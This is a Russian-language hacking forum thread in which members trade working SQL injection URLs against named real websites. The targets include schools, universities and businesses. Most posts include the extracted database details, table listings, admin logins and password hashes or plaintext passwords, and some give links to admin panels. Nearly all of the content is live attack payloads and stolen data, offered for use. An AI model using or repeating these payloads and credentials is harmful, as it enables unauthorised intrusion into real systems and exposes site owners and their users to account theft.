SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.manualguitar.ru/urok.php?w=-57+UNION+SELECT+1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3

    Database Version: 5.1.32-community-log
    Database name: Dkfmxjh_guitar
    User name: [email protected]
     
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.ig-schuerenweg.de/news.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--

    dbu1141895@localhost:db1141895-1:5.0.32-Debian_7etch10-log

    tables :presse,news
     
    _________________________
    1 person likes this.
  3. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.bazywiedzy.com/zadanie.php?id_task=-11+UNION+SELECT+1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8

    Database Version: 5.1.33-log
    Database name: xwm62598_baza1
    User name: [email protected]


    Таблицы:

    Code:
    Database [xwm62598_baza1]
        Table [application  ( Rows)]
        Table [chemical_formula  ( Rows)]
        Table [downloaded_app  ( Rows)]
        Table [formula  ( Rows)]
        Table [function  ( Rows)]
        Table [game_code  ( Rows)]
        Table [gielda_pracy_oferty  ( Rows)]
        Table [group  ( Rows)]
        Table [groups  ( Rows)]
        Table [lesson  ( Rows)]
        Table [lesson_student  ( Rows)]
        Table [login_status  ( Rows)]
        Table [messages  ( Rows)]
        Table [riddle  ( Rows)]
        Table [status  ( Rows)]
        Table [student  ( Rows)]
        Table [task_formula  ( Rows)]
        Table [tasks  ( Rows)]
    
     
    2 people like this.
  4. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    http://logua.com
    u_logua@localhost
    4.1.22-log
    logua

    http://www.bazar.nikolaev.ua
    bazar_old@apollo
    4.1.22-log
    bazar_old


    http://www.bib.com.ua
    bibcom_exhaustic@localhost
    5.0.45-community
    bibcom_newbib

    http://www.bikeshop.dp.ua
    bikeforu_bikefor@localhost
    5.0.45-log
    bikeforu_site

    http://www.koss.com.ua
    dbuser@localhost
    4.1.22-log
    itkom

    http://music-car.com.ua
    u_musiccar@localhost
    4.1.22-log
    musiccar
     
    1 person likes this.
  5. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.sovinterior.ru/nomer.php?n=-46+UNION+SELECT+1,2,3,4,5,6,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),8

    Database Version: 5.0.58-log
    Database name: sovint
    User name: si@localhost


    Code:
    Database [sovint]
        Table [about  ( Rows)]
        Table [adv_advertisers  ( Rows)]
        Table [adv_banners  ( Rows)]
        Table [adv_brands  ( Rows)]
        Table [adv_categories  ( Rows)]
        Table [adv_proposes  ( Rows)]
        Table [anons  ( Rows)]
        Table [baner  ( Rows)]
        Table [gost  ( Rows)]
        Table [img_stat  ( Rows)]
        Table [link_razd  ( Rows)]
        Table [link_sv  ( Rows)]
        Table [links  ( Rows)]
        Table [names  ( Rows)]
        Table [names_img  ( Rows)]
        Table [names_obj  ( Rows)]
        Table [news  ( Rows)]
        Table [news_img  ( Rows)]
        Table [nomer  ( Rows)]
        Table [podp  ( Rows)]
        Table [reklama  ( Rows)]
        Table [stati  ( Rows)]
        Table [tema  ( Rows)]
        Table [zapret  ( Rows)]

    -------------------

    http://www.sibuch.ru/nomer.php?cod=-34+UNION+SELECT+1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8,9

    Database Version: 4.1.20
    Database name: go
    User name: go@localhost


    доступна mysql.user

    http://www.sibuch.ru/nomer.php?cod=-34+UNION+SELECT+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9+FROM+mysql.user

    root:4983f4fc2c0bc60f

    etc...
     
  6. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    http://www.transammiak.com.ua

    transammiak_com_@localhost
    5.0.81
    transammiak_com_ua

    таблы

    Админы
    Логин: админНаАнгл
    Пасс: amiak

    http://www.transammiak.com.ua/админНаАнгл/
    Админка


    http://www.kazakh.ru
    [email protected]
    4.1.13
    kazakh
     
    1 person likes this.
  7. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.motokater.ru/razbor.php?show=-43+UNION+SELECT+1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3,4

    Database Version: 5.0.77-community-log
    Database name: motokate_db
    User name: motokate_user@localhost


    Code:
    Database [motokate_db]
        Table [mk_greases  ( Rows)]
            greases_id
            greases_name
        Table [mk_manags  ( Rows)]
            manags_id
            manags_name
        Table [mk_motors  ( Rows)]
            motors_id
            manags_id
            starts_id
            raiseis_id
            greases_id
            motors_name
            motors_price
            motors_cylnum
            motors_img
            motors_order
        Table [mk_raiseis  ( Rows)]
            raiseis_id
            raiseis_name
        Table [mk_starts  ( Rows)]
            starts_id
            starts_name
        Table [mk_users  ( Rows)]
            users_id
            users_login
            users_password
        Table [moto  ( Rows)]
            id
            model
            type
            price
            description
            obem
        Table [razbor  ( Rows)]
            id
            model
            price
            description
        Table [spec  ( Rows)]
            id
            model
            price
            description
        Table [user_ugolok  ( Rows)]
            text
        Table [yacht  ( Rows)]
            id
            model
            price
            description
    Заинтересовала таблица mk_users
    1: putin:21232f297a57a5a743894a0e4a801fc3

    тот самый путин? :)
     
  8. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Каталог Lookfor PR 2

    Version() - 5.0.51a-3ubuntu5
    Database() - lookfor
    User() - root@localhost

    Админка http://lookfor.ws/admin/admin.php - взломать не удалось, в бд пароли от word press.

    P.S админка злостно матерится) :) :) :)
     
  9. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    PR 3

    http://www.hflcsd.org/staffpages/staffmemberpage.php?id=-619+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3/*

    Database Version: 4.1.13a-log
    Database name: hflcsd_db
    User name: [email protected]


    Есть таблица: admin
    подобрал поля: email,id,password

    [email protected]:1:s4n5t6
     
  10. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    http://www.marafon.com.ua
    marafon@localhost
    4.1.22-standard
    marafon_test1

    http://www.wollemipine.com.ua
    [email protected]
    db11330xwp
    4.1.22

    http://www.euroizol.com
    ftp00001252_dbu@localhost
    ftp00001252_db
    5.0.37

    Юзеры
    Логин: gkadm
    Пасс: siteadmin
    Логин: solyanov
    Пас: kruto

    Админка но пассы не подходят
    http://www.euroizol.com/admin.php


    http://www.restin.crimea.ua
    dbuser@localhost
    4.1.22-log
    restincr_restin



    http://www.odessamik.org.ua
    http://www.odessamik.org.ua/main.php?id=415+UNION+SELECT+0,concat_Ws(0x0b,u ser(),databa se(),version()),2,3,4
    u_odessamik@localhost
    odessamik
    4.1.22
     
    1 person likes this.
  11. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.chineselawcf.com/show.php?id_a=19285+union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+/*+

    http://www.mua.no/student.php?student_id=-8792'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a3a,user,passwd),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+user+--+
    admin::43e9a4ab75570f5b

    pr5
    http://www.bothnian.net/FoskJR/student.php?student_id=-20+union+select+1,2,3,user,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user+/*+
    roo::6cd538b23444e59e

    pr5
    http://www.parkviewamc.org/contact/doctor.php?ID=-154+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+/*+

    http://www.coopervision.ru/doctor.php?id=-5+union+select+1,2,3,4+--+

    http://www.dentalpalace.ru/actions.php?id=-4+union+select+1,2,3,4,5,6+/*+

    http://www.smartis.ru/test/dental/actions.php?id=-2+union+select+1,concat(table_name),3,4,5,6+from+information_schema.tables+/*+
     
  12. Kimliksiz

    Kimliksiz Member

    Joined:
    7 May 2009
    Messages:
    31
    Likes Received:
    12
    Reputations:
    11
    http://www.zazieweb.fr/site/reagir.php?num=-107+union+select+1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5/*
     
    #9632 Kimliksiz, 5 Jun 2009
    Last edited by a moderator: 5 Jun 2009
  13. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    http://www.technolider.com.ua/

    5.0.67-community|technoli_products|technoli_kox@localhost

    ==================================================

    http://www.cpofla.org/

    5.0.51a-community|cdgajywl_smf1|cdgajywl_smf1@localhost

    ==================================================

    http://www.orient-ufa.ru/

    5.0.77-community-log|orientuf_realt|orientuf@localhost

    ==================================================

    http://www.gorod-na-ozere.com.ua/

    5.0.67-community-log|gorod|gorod@localhost
     
    #9633 TreV@N, 5 Jun 2009
    Last edited by a moderator: 5 Jun 2009
  14. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Code:
     http://neolit.psu.ru/usr_intro1.php?sel_id=19{SQLINJ}
    
    Один из поддоменов Пермского гос. универа
    
    Таблы: phpbb_users,test
    
    
     
    1 person likes this.
  15. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    http://i-kiev.com/

    5.0.75-community-log|fouahtun_ikyiv|fouahtun_guest@localhost
     
    #9635 TreV@N, 5 Jun 2009
    Last edited by a moderator: 5 Jun 2009
  16. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    ЕДИНАЯ ТАКСОФОННАЯ КАРТА РОССИИ

    http://etcard.ru/page.php?item=-page01'+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5%23

    nevodspbru:5.0.26-log:nevodspbru@localhost
     
    _________________________
  17. trefet2

    trefet2 New Member

    Joined:
    25 May 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    http://www.simplyred.com/index.php?id=-1+union+Select+1,version(),3,4,5,6,7--
    4.1.22-standard
    simplywi_news@localhost
     
  18. trefet2

    trefet2 New Member

    Joined:
    25 May 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    http://dubster.com/cars/index.php?id=-1+union+select+1,2,3,version(),5,6,7,8--
    5.0.67.d7-ourdelta-log
    [email protected]
     
  19. ReduKToR

    ReduKToR Active Member

    Joined:
    5 Jan 2009
    Messages:
    257
    Likes Received:
    179
    Reputations:
    4
    ТИЦ:30 PR:4
     
    1 person likes this.
  20. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    http://belhor.org/

    Database Version: 5.0.51a-6-log
    Database name: belhororg
    User name: belhororg@localhost


    ==================================================

    http://www.indigonetworks.com/

    Database Version: 4.0.23-debug
    Database name: indigonetworks
    User name: indigo_admin@localhost


    ==================================================

    http://www.portofbelledune.ca/

    Database Version: 5.0.18-nt
    Database name: portofbelledunedb
    User name: portUSER@localhost


    ==================================================

    http://nanotech.saudiclubmelbourne.com/

    Database Version: 5.0.75-community-log
    Database name: saudiclu_nano2008
    User name: saudiclu_saudicl@localhost
     
    1 person likes this.
Thread Status:
Not open for further replies.